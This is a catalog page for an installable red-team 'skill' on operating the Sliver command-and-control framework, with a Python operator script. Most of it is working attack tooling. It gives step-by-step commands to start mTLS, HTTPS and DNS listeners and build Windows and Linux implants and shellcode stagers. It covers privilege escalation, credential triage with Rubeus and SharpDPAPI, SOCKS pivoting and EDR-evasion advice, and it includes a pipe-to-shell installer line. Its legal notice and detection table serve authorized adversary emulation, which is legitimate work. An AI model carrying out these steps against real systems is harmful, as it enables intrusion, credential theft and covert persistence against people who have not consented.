red teaming

Operating Sliver C2

Stand up a Sliver C2 server and listeners, generate cross-platform implants and beacons, and run post-exploitation, pivoting, and BOF/.NET tooling via the armory for adversary emulation.

adversary-emulationcommand-and-controlimplantmtlspivotingpost-exploitationred-teamsliver
Install this skill
npx skills add mukul975/Anthropic-Cybersecurity-Skills
Framework mappings

Legal Notice: This skill is for authorized security testing, red-team engagements, and educational purposes only. Operating a command-and-control framework against systems you do not own or lack explicit written authorization to test is illegal and may violate computer fraud, wiretap, and abuse statutes. Always work within a signed rules-of-engagement document.

Overview

Sliver is an open-source, cross-platform adversary emulation and command-and-control (C2) framework developed by BishopFox (https://github.com/BishopFox/sliver). It is written in Go and is widely used by red teams as a modern, open alternative to commercial frameworks such as Cobalt Strike. Sliver supports two implant interaction models: sessions (interactive, real-time) and beacons (asynchronous check-in with configurable jitter), and it speaks C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS. Each implant is dynamically compiled with per-binary, asymmetric encryption keys, so no two implants share static signatures.

Sliver also ships an armory — an alias and extension package manager that installs third-party tooling such as Beacon Object Files (BOFs) and .NET assemblies (e.g., sharpdpapi, seatbelt, rubeus) for in-memory execution. Because Sliver has been adopted by real threat actors (documented by Cybereason, Microsoft, and others), exercising it during sanctioned engagements is valuable both for emulating realistic adversary tradecraft and for validating that defensive controls (EDR, network detection, DNS monitoring) catch its C2 channels. This skill covers deploying the server, generating implants, managing listeners, running post-exploitation, and pivoting through compromised hosts.

When to Use

  • When conducting an authorized red-team engagement that requires a resilient, multi-protocol C2 channel
  • When emulating a specific threat actor's TTPs that include Sliver (per CTI reporting) during a purple-team exercise
  • When validating that EDR and network monitoring detect mTLS/HTTPS/DNS beaconing
  • When demonstrating post-exploitation and lateral movement impact for a report

Prerequisites

  • A dedicated Linux redirector/team-server host (Sliver server runs on Linux/macOS/Windows; Linux is standard)
  • Root or sudo for binding privileged ports (443/53) and installing the multiplayer daemon
  • Outbound/inbound network reachability matching the chosen C2 protocol
  • Familiarity with Active Directory and post-exploitation concepts
  • Signed authorization / rules of engagement

Install Sliver server with the official one-liner, or download release binaries:

# Official installer (downloads latest sliver-server + client)
curl https://sliver.sh/install | sudo bash
 
# Or download specific release binaries from GitHub
wget https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux
wget https://github.com/BishopFox/sliver/releases/latest/download/sliver-client_linux
chmod +x sliver-server_linux sliver-client_linux

Objectives

  • Launch the Sliver server console and operate in single- or multiplayer mode
  • Start mTLS, HTTPS, and DNS C2 listeners
  • Generate session and beacon implants for multiple OS/architectures
  • Stage implants and host them for delivery
  • Interact with callbacks, run post-exploitation, and dump credentials
  • Install and run armory extensions (BOFs and .NET assemblies)
  • Pivot through a compromised host into segmented networks

MITRE ATT&CK Mapping

ID Technique Use in this skill
T1071.001 Application Layer Protocol: Web Protocols Sliver HTTP(S) C2 listeners blend implant traffic with normal web traffic

Related techniques exercised by the workflow:

ID Technique
T1572 Protocol Tunneling (WireGuard / pivot tunnels)
T1090.001 Internal Proxy (Sliver pivots)
T1059 Command and Scripting Interpreter (implant execute-assembly / shell)
T1620 Reflective Code Loading (in-memory .NET execution)

Workflow

Step 1: Start the Sliver server console

Run the server interactively to get the operator console:

sudo ./sliver-server

Inside the sliver > console, confirm version and view help:

sliver > version
sliver > help

Step 2: (Optional) Configure multiplayer for a team

On the server, generate an operator config and start the multiplayer listener:

sliver > new-operator --name operator1 --lhost teamserver.example.com --save ./operator1.cfg
sliver > multiplayer --lport 31337

Distribute operator1.cfg to teammates, who import it with the standalone client:

./sliver-client import ./operator1.cfg
./sliver-client

Step 3: Start C2 listeners

Start one or more listeners. mTLS is the most robust; HTTPS blends with web traffic; DNS is the stealthiest egress for restrictive networks:

# Mutual TLS listener on 443
sliver > mtls --lport 443
 
# HTTPS listener (serves on 443 by default; supports custom certs)
sliver > https --lport 443
 
# Plain HTTP (useful behind a TLS-terminating redirector)
sliver > http --lport 80
 
# DNS listener for a delegated zone you control
sliver > dns --domains c2.example.com. --lport 53
 
# View running listeners / background jobs
sliver > jobs

Step 4: Generate implants

Generate a session implant pointing at your mTLS endpoint:

sliver > generate --mtls teamserver.example.com:443 --os windows --arch amd64 --format exe --save /tmp/

Generate a beacon with jitter for asynchronous, lower-noise operation:

sliver > generate beacon --mtls teamserver.example.com:443 --os windows --arch amd64 --seconds 60 --jitter 30 --save /tmp/

Other useful formats and channels:

# HTTPS beacon, shellcode format for injection
sliver > generate beacon --http teamserver.example.com --os windows --arch amd64 --format shellcode --save /tmp/
 
# DNS implant for egress-restricted targets
sliver > generate --dns c2.example.com. --os windows --format exe --save /tmp/
 
# Linux/macOS ELF/Mach-O implants
sliver > generate --mtls teamserver.example.com:443 --os linux --arch amd64 --format elf --save /tmp/
 
# List and remove generated implant builds
sliver > implants
sliver > implants rm IMPLANT_NAME

Step 5: Stage implants (optional)

Host a stager for size-constrained delivery. First start a stage listener, then generate a matching stager:

sliver > profiles new --mtls teamserver.example.com:443 --format shellcode --os windows --arch amd64 win-stage
sliver > stage-listener --url tcp://teamserver.example.com:8443 --profile win-stage
sliver > generate stager --lhost teamserver.example.com --lport 8443 --arch amd64 --format c

Step 6: Interact with callbacks

When an implant calls back, list and select it:

# Interactive sessions
sliver > sessions
sliver > use SESSION_ID
 
# Asynchronous beacons
sliver > beacons
sliver > use BEACON_ID

Inside an interactive session run core post-exploitation commands:

sliver (SESSION) > info
sliver (SESSION) > whoami
sliver (SESSION) > getprivs
sliver (SESSION) > ls
sliver (SESSION) > netstat
sliver (SESSION) > ps -T            # show injected/protected processes
sliver (SESSION) > screenshot
sliver (SESSION) > execute -o whoami /all

Get a system shell or run a command without spawning a noisy cmd.exe:

sliver (SESSION) > shell            # full interactive shell (noisy; use sparingly)
sliver (SESSION) > execute -o ipconfig /all

Step 7: Privilege escalation and credential access

# Migrate into another process / impersonate
sliver (SESSION) > migrate PID
sliver (SESSION) > make-token -u DOMAIN\\user -p Password123
sliver (SESSION) > getsystem        # attempt SYSTEM via service/named-pipe
 
# Run .NET tooling in memory (after armory install, see Step 8)
sliver (SESSION) > rubeus triage
sliver (SESSION) > seatbelt -group=system

Step 8: Install and run armory extensions

The armory installs BOFs and .NET assemblies for in-memory use:

sliver > armory                     # list available packages
sliver > armory install all         # or: armory install rubeus / sharpdpapi / etc.
sliver > armory update

Once installed, the alias/extension is available inside a session as a first-class command:

sliver (SESSION) > sharp-dpapi triage
sliver (SESSION) > sa-whoami        # SA = situational awareness BOFs
sliver (SESSION) > inline-execute-assembly /opt/tools/Seatbelt.exe -group=all

Step 9: Pivot into segmented networks

Sliver supports named-pipe and TCP pivots plus SOCKS/port-forwarding for tooling:

# Start a SOCKS5 proxy over the implant for proxychains-driven tools
sliver (SESSION) > socks5 start --port 1081
 
# Local/reverse port forwards
sliver (SESSION) > portfwd add --bind 127.0.0.1:3389 --remote 10.0.5.20:3389
 
# TCP pivot listener on the beachhead so deeper implants chain through it
sliver (SESSION) > pivots tcp --bind 0.0.0.0:9898
sliver > generate --tcp-pivot 10.0.5.10:9898 --os windows --format exe --save /tmp/
sliver (SESSION) > pivots                # list active pivot graph

Step 10: Clean up

Remove implants, close sessions, and stop listeners at engagement end:

sliver (SESSION) > kill              # terminate the implant cleanly
sliver > jobs -k JOB_ID             # stop a specific listener
sliver > implants rm IMPLANT_NAME

Tools and Resources

Resource Purpose Link
Sliver (BishopFox) C2 framework source and releases https://github.com/BishopFox/sliver
Sliver Wiki Official documentation https://github.com/BishopFox/sliver/wiki
Sliver docs site Migrated docs https://sliver.sh/docs
Sliver Armory Extension/alias package index https://github.com/sliverarmory
MITRE ATT&CK T1071.001 Web Protocols technique https://attack.mitre.org/techniques/T1071/001/

OPSEC and Detection Considerations

Channel Blends with Defender detection opportunity
mTLS (443) TLS traffic JA3/JA3S fingerprinting, self-signed cert anomalies
HTTPS Web browsing Beaconing periodicity, URI/User-Agent profiling
DNS DNS resolution High-entropy/long subdomain queries, TXT volume
WireGuard VPN traffic Unexpected UDP tunnels from workstations
  • Prefer beacons with jitter over interactive sessions to reduce timing regularity.
  • Avoid shell — it spawns cmd.exe/powershell.exe children that EDR flags; prefer execute and inline assemblies.
  • Use redirectors (nginx/Apache) in front of HTTP(S) listeners so the team server IP is never exposed.

Validation Criteria

  • Sliver server console launches and version reports the installed build
  • At least one listener (mTLS/HTTPS/DNS) is running and visible in jobs
  • A session implant and a beacon implant are generated for the target OS/arch
  • An implant calls back and appears in sessions/beacons
  • Post-exploitation commands (info, whoami, screenshot) execute successfully
  • An armory extension is installed and executed in-memory
  • A SOCKS proxy or port-forward is established for pivoting
  • Implants killed, listeners stopped, and artifacts removed at cleanup
Source materials

References and resources

Everything below is rendered for inspection. Script files are read-only and never run.

References 2

api-reference.md3.3 KB

Sliver C2 Command Reference

Source: BishopFox Sliver Wiki (https://github.com/BishopFox/sliver/wiki) and console help.

Server / multiplayer

Command Description
sliver-server Launch the server console (single-player)
multiplayer --lport 31337 Start the multiplayer gRPC listener
new-operator --name NAME --lhost HOST --save FILE.cfg Generate an operator config file
sliver-client import FILE.cfg Import operator config into the standalone client
version Print server/client version
jobs / jobs -k ID List / kill background listener jobs

Listeners (C2 jobs)

Command Description
mtls --lport 443 Start a Mutual TLS listener
https --lport 443 Start an HTTPS listener
http --lport 80 Start a plain HTTP listener
dns --domains c2.example.com. --lport 53 Start a DNS listener for a delegated zone
wg --lport 53 Start a WireGuard listener
stage-listener --url tcp://HOST:8443 --profile NAME Serve a staged payload

Implant generation

Command / flag Description
generate --mtls HOST:443 Generate a session implant over mTLS
generate beacon --mtls HOST:443 --seconds 60 --jitter 30 Generate a beacon with check-in interval and jitter
--http HOST / --dns ZONE. / --wg HOST Select alternative C2 channels
`--os windows linux
`--arch amd64 386
`--format exe shellcode
--save PATH Output directory
--tcp-pivot HOST:PORT Build an implant that connects to a TCP pivot
generate stager --lhost HOST --lport PORT --arch amd64 --format c Generate a stager
implants / implants rm NAME List / delete built implants
profiles new ... NAME / profiles Save/list reusable implant profiles

Session / beacon interaction

Command Description
sessions / use SESSION_ID List / select interactive sessions
beacons / use BEACON_ID List / select beacons
info Implant metadata
whoami / getprivs Identity and privileges
ps -T Process list (with protection flags)
ls, cd, download, upload, cat, rm File operations
netstat, ifconfig Network state
screenshot Capture screen
execute -o CMD ARGS Run a command and capture output
shell Interactive system shell (noisy)
migrate PID Migrate into another process
make-token -u DOMAIN\\user -p PASS Create an alternate logon token
getsystem Attempt SYSTEM escalation
kill Terminate the implant

Armory (extensions / aliases)

Command Description
armory List available packages
armory install all / armory install NAME Install BOFs / .NET aliases
armory update Update installed packages
inline-execute-assembly PATH ARGS Run a .NET assembly in-memory

Pivoting

Command Description
socks5 start --port 1081 Start a SOCKS5 proxy through the implant
portfwd add --bind 127.0.0.1:LP --remote HOST:RP Add a port forward
pivots tcp --bind 0.0.0.0:9898 Start a TCP pivot listener on the beachhead
pivots Show the pivot graph
standards.md1.4 KB

Standards Mapping: Operating Sliver C2

MITRE ATT&CK

ID Name Rationale
T1071.001 Application Layer Protocol: Web Protocols Sliver's HTTP(S) C2 listeners tunnel implant traffic over web protocols to blend with legitimate browsing and evade egress filtering.

Related techniques exercised

ID Name Rationale
T1572 Protocol Tunneling WireGuard and pivot tunnels encapsulate C2 inside other protocols.
T1090.001 Proxy: Internal Proxy TCP/named-pipe pivots and SOCKS proxies route operator traffic through compromised internal hosts.
T1059 Command and Scripting Interpreter Implant execute/shell runs commands on the target.
T1620 Reflective Code Loading inline-execute-assembly and BOFs load and run code in-memory without touching disk.

NIST CSF 2.0

ID Name Rationale
DE.CM-01 Networks and network services are monitored to find potentially adverse events This skill validates that network monitoring detects Sliver's mTLS/HTTPS/DNS C2 channels and beaconing patterns, which is the defensive control DE.CM-01 governs.

References

Scripts 1

agent.py6.3 KB
Display-only source. This catalog never executes bundled scripts.
#!/usr/bin/env python3
"""
Sliver C2 operator automation helper.

Uses the official `sliver-py` gRPC client library (multiplayer / mTLS) to
automate operator interactions with a running Sliver server:

  * list active sessions and beacons
  * list running C2 listener jobs
  * generate an implant build (mTLS/HTTP/DNS)
  * run a single command inside an interactive session and print output

Authorized red-team / lab use only.

Install:
    pip install sliver-py        # for Sliver server v1.5.29+
Requires a Sliver operator config (created with `new-operator ... --save FILE`).

Docs: https://github.com/moloch--/sliver-py
"""

import argparse
import asyncio
import os
import sys

try:
    from sliver import SliverClientConfig, SliverClient
    from sliver import client_pb2
except ImportError:
    sys.stderr.write(
        "[!] sliver-py is not installed. Run: pip install sliver-py\n"
    )
    sys.exit(1)


async def connect(config_path):
    """Parse an operator config and return a connected SliverClient."""
    if not os.path.isfile(config_path):
        raise FileNotFoundError(f"operator config not found: {config_path}")
    config = SliverClientConfig.parse_config_file(config_path)
    client = SliverClient(config)
    await client.connect()
    return client


async def cmd_sessions(client):
    sessions = await client.sessions()
    if not sessions:
        print("[*] No active sessions.")
        return
    print(f"[*] {len(sessions)} active session(s):")
    for s in sessions:
        print(f"  ID={s.ID}  {s.Name}  user={s.Username}  "
              f"host={s.Hostname}  os={s.OS}/{s.Arch}  remote={s.RemoteAddress}")


async def cmd_beacons(client):
    beacons = await client.beacons()
    if not beacons:
        print("[*] No active beacons.")
        return
    print(f"[*] {len(beacons)} active beacon(s):")
    for b in beacons:
        print(f"  ID={b.ID}  {b.Name}  user={b.Username}  "
              f"host={b.Hostname}  interval={b.Interval}s  jitter={b.Jitter}")


async def cmd_jobs(client):
    jobs = await client.jobs()
    if not jobs:
        print("[*] No running jobs/listeners.")
        return
    print(f"[*] {len(jobs)} job(s):")
    for j in jobs:
        print(f"  ID={j.ID}  {j.Name}  protocol={j.Protocol}  port={j.Port}")


async def cmd_generate(client, host, proto, os_target, arch, fmt, save_dir):
    """Generate an implant build via the server."""
    c2 = client_pb2.ImplantC2(Priority=0, URL=f"{proto}://{host}")
    fmt_map = {
        "exe": client_pb2.OutputFormat.EXECUTABLE,
        "shellcode": client_pb2.OutputFormat.SHELLCODE,
        "shared": client_pb2.OutputFormat.SHARED_LIB,
        "service": client_pb2.OutputFormat.SERVICE,
    }
    config = client_pb2.ImplantConfig(
        GOOS=os_target,
        GOARCH=arch,
        Format=fmt_map.get(fmt, client_pb2.OutputFormat.EXECUTABLE),
        IsBeacon=False,
        C2=[c2],
    )
    print(f"[*] Requesting implant build ({os_target}/{arch}, {fmt}, {proto})...")
    implant = await client.generate_implant(config)
    out_path = os.path.join(save_dir, implant.File.Name)
    with open(out_path, "wb") as fh:
        fh.write(implant.File.Data)
    print(f"[+] Implant written: {out_path} ({len(implant.File.Data)} bytes)")


async def cmd_exec(client, session_id, command):
    """Run a single command inside an interactive session."""
    interact = await client.interact_session(session_id)
    if interact is None:
        print(f"[!] No session with ID {session_id}")
        return
    parts = command.split()
    exe, args = parts[0], parts[1:]
    print(f"[*] execute {command} on session {session_id}")
    result = await interact.execute(exe, args, True)
    if result.Stdout:
        sys.stdout.write(result.Stdout.decode(errors="replace"))
    if result.Stderr:
        sys.stderr.write(result.Stderr.decode(errors="replace"))
    print(f"\n[+] exit status: {result.Status}")


def build_parser():
    p = argparse.ArgumentParser(
        description="Sliver C2 operator automation helper (sliver-py)."
    )
    default_cfg = os.path.join(
        os.path.expanduser("~"), ".sliver-client", "configs", "default.cfg"
    )
    p.add_argument("-c", "--config", default=default_cfg,
                   help="path to operator .cfg (default: %(default)s)")
    sub = p.add_subparsers(dest="action", required=True)

    sub.add_parser("sessions", help="list active sessions")
    sub.add_parser("beacons", help="list active beacons")
    sub.add_parser("jobs", help="list running listener jobs")

    g = sub.add_parser("generate", help="generate an implant build")
    g.add_argument("--host", required=True, help="C2 host[:port]")
    g.add_argument("--proto", default="mtls",
                   choices=["mtls", "http", "https", "dns"])
    g.add_argument("--os", dest="os_target", default="windows",
                   choices=["windows", "linux", "darwin"])
    g.add_argument("--arch", default="amd64",
                   choices=["amd64", "386", "arm64"])
    g.add_argument("--format", dest="fmt", default="exe",
                   choices=["exe", "shellcode", "shared", "service"])
    g.add_argument("--save", default=".", help="output directory")

    e = sub.add_parser("exec", help="run a command in a session")
    e.add_argument("--session", required=True, help="session ID")
    e.add_argument("--command", required=True, help="command line to run")

    return p


async def run(args):
    client = await connect(args.config)
    try:
        if args.action == "sessions":
            await cmd_sessions(client)
        elif args.action == "beacons":
            await cmd_beacons(client)
        elif args.action == "jobs":
            await cmd_jobs(client)
        elif args.action == "generate":
            await cmd_generate(client, args.host, args.proto, args.os_target,
                               args.arch, args.fmt, args.save)
        elif args.action == "exec":
            await cmd_exec(client, args.session, args.command)
    finally:
        # SliverClient uses a long-lived gRPC channel; nothing to close explicitly.
        pass


def main():
    args = build_parser().parse_args()
    try:
        asyncio.run(run(args))
    except FileNotFoundError as exc:
        sys.stderr.write(f"[!] {exc}\n")
        sys.exit(2)
    except Exception as exc:  # noqa: BLE001 - surface gRPC/connection errors clearly
        sys.stderr.write(f"[!] error: {exc}\n")
        sys.exit(1)


if __name__ == "__main__":
    main()
Keep exploring